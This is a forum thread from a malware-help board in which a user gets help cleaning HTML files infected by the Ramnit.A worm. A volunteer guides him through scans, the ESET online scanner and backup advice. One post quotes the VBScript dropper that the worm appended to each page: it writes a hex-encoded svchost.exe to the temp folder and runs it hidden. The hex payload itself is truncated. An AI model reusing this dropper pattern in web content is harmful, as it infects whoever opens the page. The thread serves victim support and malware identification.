HTML files infected by RAMNIT.a

Discussion in 'Malware Help (A Specialist Will Reply)' started by ColinC, Sep 7, 2010.

  1. ColinC

    ColinC Private E-2

    I had a W32/RAMNIT.a infection on my PC, which the McAfee Virus removal team could not remove and told me to go to my computer supplier.

    As will be seen from other threads, this nasty alters the registry, adds a program (DesktopLayer.exe) which autoruns on login (from an undeletable registry entry), infects .exe and .dll files and (something I haven't seen stated much) also infects every .html file, adding some VBS code to call SVCHOST.exe with a dropfile and a shedload of hex code.

    Every HTML file on my PC (over 1,000 of them) was altered on the same afternoon and all now contain this code.

    I installed a new HDD, new OS, re-installed McAfee Internet Security Suite and only pulled back from my drive those files which "passed."

    Trouble is, it passed all the html files, which I have not dared to open in Internet Explorer, though I have examined them in Notepad.

    Is there a routine anyone has that will clean these files, or do I have to manually remove the code from each one?

    Incidentally, my second call to McAfee resulted in them telling me that this code is quite safe and nothing to worry about. Can anyone confirm this, or am I right to be paranoid? :(
     
    Last edited: Sep 7, 2010
  2. evilfantasy

    evilfantasy Malware Fighter

    Welcome to MajorGeeks!

    We have a bit of a dilemma here. Since the infected files are documents that I am assuming you need to keep, if we go to cleaning the computer you might lose them in the process.

    So, with that said, we cannot give you a proper diagnosis until we get the logs from the READ & RUN ME FIRST. Malware Removal Guide.

    Can you copy the files onto a flash drive or CD so if they do end up being removed or "cleaned" by one of the scanners you will still have a copy of them? It may be an infected copy but that's better than NO copy at all.
     
  3. ColinC

    ColinC Private E-2

    Sorry, please find attached the logfile for ComboFix. The other programs reported no issues.

    I have backed up the suspect .html files (and still have not opened any of them in IE).

    Colin
  4. ColinC

    ColinC Private E-2

    Oops missed a couple of logs - ignore for the present :-o
     
  5. ColinC

    ColinC Private E-2

    Unable to install RootRepeal; it reported several files missing.

    Remaining files installed as requested. HTML files all backed up.

    SAS did not leave me a log, though no issues or errors were reported.

    Best regards, Colin
  6. evilfantasy

    evilfantasy Malware Fighter

    Try this one please.


    Download the GMER Rootkit Detector and save it to your desktop.

    * Extract it to your desktop and double-click GMER.exe
    * Make sure all of the boxes on the right of the screen are checked, EXCEPT for "Show All".
    * Click the Rootkit tab and then Scan.
    * Don't check the Show All box while scanning in progress!
    * When scanning is finished click Copy.
    * This copies the log to clipboard
    * Attach the log in your reply.
     
  7. ColinC

    ColinC Private E-2

    GMER file attached as requested. Sorry for the delay; I was away at the weekend and the file would not upload yesterday (it said the service was unavailable).
  8. evilfantasy

    evilfantasy Malware Fighter

    I don't see anything in your logs to indicate that the computer is infected.

    Can you attach the MBAM and SAS logs please? They are located here:

    Code:
    C:\Users\Colin\AppData\Roaming\SUPERAntiSpyware.com\SUPERAntiSpyware\Logs\"
    supera~1.log
    Code:
    C:\Users\Colin\AppData\Roaming\Malwarebytes\Malwarebytes' Anti-Malware\Logs\"
    mbam-l~1.txt
     
  9. ColinC

    ColinC Private E-2

    As I said in my first post, I am sure I have cleared the infection on the PC; a new hard disk drive and a new operating system sorted that. The problem is that every .html file in the data I subsequently imported from the old PC was altered on the same day the virus went active (file properties all show the same modified time and date).

    They each have the same code appended at the end of the file (opened in Notepad; I have opened none of them yet in Internet Explorer).

    The code begins with
    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A90000... followed by many lines of hex code terminating with

    0000000000000000000000000000000000000000000000000000000000000000000000000000"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //-->

    This is the code I am concerned about. It is present in over 1000 files. My fear is that if I open one in Explorer and authorise the page to run the ActiveX script, I will be back to square one with the PC.

    Thanks for the help finding the files; I must have a setting turned off in my admin login that failed my search for them!
  10. evilfantasy

    evilfantasy Malware Fighter

    Sorry for the delay. I had to ask a few questions on how to proceed with this before giving advice on moving forward.

    Do you have the HTML files backed up somewhere like a CD or flash drive? If on a flash drive make sure it is not connected to the computer. We will use a good online scanner that has the ability to clean HTML files but as with anything you need to have them backed up in case the scanner removes them instead of cleaning them.

    First clean out any unnecessary junk with TFC to make the online scan go faster.

    Download TFC by OldTimer to your desktop.

    Double-click TFC.exe to run it.

    Note: If you are running on Vista, right-click on the file and choose Run As Administrator

    TFC will close all programs when run, so make sure you have saved all your work before you begin.

    * Click the Start button to begin the cleaning process.
    * Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
    * Please let TFC run uninterrupted until it is finished.

    Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.




    Next let's see if the ESET online scan can repair the files. Follow the directions here. Using ESET's Online Scanner

    Attach the log when complete.
     
  11. ColinC

    ColinC Private E-2

    Congratulations and thanks!! This process confirmed my suspicions and found 1707 files infected by ramnit.a.

    I didn't witness the whole scan and I did note there was at least one other potential threat identified, but without doubt the .html files I identified as modified are all in this list.

    The McAfee Virus Removal team, and their supervisor to whom I escalated the issue when they first told me it was OK to run any of them, assured me they were OK (they were using remote access to scan and view the PC and inspected the files; I showed them the dubious code and she told me that was quite normal and not to worry!!!).

    This symptom of the virus doesn't seem to have got much publicity; McAfee only had Ramnit.a as a "LOW" threat!

    Log attached as requested.
  12. evilfantasy

    evilfantasy Malware Fighter

    I was confident they would be found. The question was if they would be repaired or deleted. It looks like they were deleted. Were they cleaned or deleted?

    That was not a threat. It's part of MGtools which some antivirus see as a threat.

    Microsoft has it as a severe threat. Research Worm:Win32/Ramnit.A


    Are these HTML documents web pages you are saving to your computer?
     
  13. ColinC

    ColinC Private E-2


    They were all deleted. I do have a backup.


    Yes, I pointed that out to their VRT supervisor; didn't get much of a reaction.

    They are mainly (if not all) saved web pages.
     
  14. evilfantasy

    evilfantasy Malware Fighter

  15. ColinC

    ColinC Private E-2

    Was for offline viewing (many were from now-defunct web sites; others were for purchases made etc.).


    Noted thanks

    And thanks very much for your help. I was very uneasy about the assurance from McAfee. This was an issue I had escalated to their supervisory team after I did not accept the assurance from the tier 1 team.

    I am SO glad that I was referred here by a colleague at work. Thanks once again

    Colin
     
  16. evilfantasy

    evilfantasy Malware Fighter

    You may never get infected again but in the case that you do it is always a good idea to have your important information backed up (photos, documents etc.). The virus could have wiped out the documents and you would have no way of getting them back. If you do keep them on the computer put them in a zip file and password protect it.

    Here are a few solutions. Note: In case of hard drive failure, don't keep your backups on the same drive you use daily. Use another drive, a flash drive or burn them to a CD.

    Free online storage: You can search Google for free storage. Just be careful on what you choose. Some have strict limits and will delete your stuff for various reasons, including if you don't log in regularly. I don't have a huge amount of documents and pictures, so Google's Picasa and Google Docs work for me.

    Major Geeks offers 500MB of free online storage: Details here. Paid upgrades are also offered at reasonable rates. Dropbox also has paid and free solutions.

    Then there is the always reliable method of using CDs or one or more flash drives.




    If you are not having any other malware problems on the computer, it is time to do our final steps:

    1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no real time protection. They do not use any significant amount of resources (except a little disk space) until you run a scan. We recommend them for doing backup scans when you suspect a malware infection.
    2. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
      • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
      • "%userprofile%\Desktop\combofix" /uninstall
        • Notes: The space between the combofix" and the /uninstall, it must be there.
        • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.

    3. Go back to step 6 of the READ ME and re-enable your Disk Emulation software with Defogger if you had disabled it.
    4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
    5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
    6. If running Vista, it is time to make sure you have re-enabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
    7. Go to add/remove programs and uninstall HijackThis.
    8. Go to the C:\MGtools folder and find the MGclean.bat file. Double click on this file to run this cleanup program that will remove files and folders related to MGtools and some other items from our cleaning procedures.
    9. If you are running Win 7, Vista, Windows XP or Windows ME, do the below:
      • Refer to the cleaning procedures pointed to by step 7 of the READ ME
        for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
      • Then reboot and Enable System Restore to create a new clean Restore Point.
    10. After doing the above, you should work through the below link:
     
